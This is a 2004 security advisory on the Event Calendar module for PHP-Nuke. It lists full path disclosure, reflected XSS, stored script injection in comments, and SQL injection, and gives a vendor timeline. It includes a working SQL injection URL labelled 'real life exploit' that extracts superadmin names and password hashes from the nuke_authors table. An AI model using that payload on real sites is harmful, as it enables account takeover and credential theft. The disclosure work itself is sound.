waraxe-2004-SA038.txt

`  
  
  
  
{================================================================================}  
{ [waraxe-2004-SA#038] }  
{================================================================================}  
{ }  
{ [ Multiple vulnerabilities in Event Calendar module for PhpNuke ] }  
{ }  
{================================================================================}  
  
Author: Janek Vind "waraxe"  
Date: 17. November 2004  
Location: Estonia, Tartu  
Web: http://www.waraxe.us/index.php?modname=sa&id=38  
  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Module's Name: Event Calendar  
Module's Version: 2.13 - March 16th, 2004  
Module's Description: Provides an event calendar for PHP-Nuke communities.  
License: GNU/GPL  
Author's Name: Original author - Rob Sutton. Development continued by Holbrookau.  
Author's Email: [email protected]  
  
Event Calendar - a module for PHP-Nuke.  
Based on version 1.5 by Rob Sutton, the Event Calendar found here is much updated  
and features many improvments and add-ons. For example, the administration area features  
configuration via a graphical interface, posting of events can be moderated and users even  
have the option of adding comments to any event.  
  
Homepage: http://phpnuke.holbrookau.net/  
  
  
Vulnerabilities:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
This piece of sowtware has many security related flaws due to poor user-submitted data  
handling.   
  
  
A - Full Path Disclosure  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
A1 - full path disclosure in "config.php":  
  
http://localhost/nuke73/modules/Calendar/config.php  
  
Warning: main(modules/Calendar/configset.php): failed to open stream: No such file or directory in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 11  
Warning: main(): Failed opening 'modules/Calendar/configset.php' for inclusion (include_path='.;c:\php4\pear') in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 11  
Warning: main(mainfile.php): failed to open stream: No such file or directory in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 14  
Warning: main(): Failed opening 'mainfile.php' for inclusion (include_path='.;c:\php4\pear') in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 14  
Warning: main(modules//language/lang-english.php): failed to open stream: No such file or directory in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 19  
Warning: main(): Failed opening 'modules//language/lang-english.php' for inclusion (include_path='.;c:\php4\pear') in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 19  
  
  
A2, A3 - full path disclosure in "index.php" and "submit.php":  
  
http://localhost/nuke73/modules/Calendar/index.php  
http://localhost/nuke73/modules/Calendar/submit.php  
  
  
B - XSS aka cross site scripting:  
  
Examples:  
  
http://localhost/nuke73/modules.php?name=Calendar&file=submit&type=[xss code here]  
http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&day=[xss code here]  
http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&month=[xss code here]  
http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&year=[xss code here]  
http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&type=[xss code here]  
  
  
C - script injection in calendar event comments:  
  
It's serious bug - anyone can insert javascript exploit code to event comments  
and if user or admin will read it, javascript will trigger and bad things can  
happen - like cookie theft, arbitrary admin operations, etc.  
  
  
D - critical sql injection bugs in code:  
  
If we take a deep look at source code, then there can be found multiple sql queries,  
where some variables, mostly "$eid" and "$cid" ARE NOT surrounded with single quotes.  
Therefore sql injection is possible. Further exploitation will depend on database   
software and version. In case of the mysql version 4.x with UNION functionality enabled,  
arbitrary data can be retrieved from database, inluding admin(s) authentication credentials.  
As tradition, there is proof of concept:  
  
----------------[ real life exploit ]---------------  
  
http://localhost/nuke73/modules.php?name=Calendar&file=index&type=view&eid=-99%20UNION%20ALL%20SELECT  
%201,1,aid,1,pwd,1,1,1,1,1,1,1,1,1,1%20FROM%20nuke_authors%20WHERE%20radminsuper=1  
  
----------------[/real life exploit ]---------------  
  
  
How to fix:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Vendor contacted: 06. September 2004  
Vendor responded: 06. September 2004  
Detailed list of problems sent to vendor: 08. September 2004  
  
Since then no more response from software developer and downloadable version  
still unpatched.  
  
For help with patching look @ here - http://www.waraxe.us/forums.html  
  
  
Additional recources:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Free proxy lists - http://www.waraxe.us/forum/viewforum.php?f=21  
Base64 online tool - http://base64-encoder-online.waraxe.us/base64/base64-encoder.php  
  
  
Greetings:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Greets to Raido Kerna, icenix, g0df4th3r and slimjim100!  
Tervitused - Heintz ja Maku!  
  
Contact:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
[email protected]  
Janek Vind "waraxe"  
  
Homepage: http://www.waraxe.us/  
  
---------------------------------- [ EOF ] ------------------------------------  
`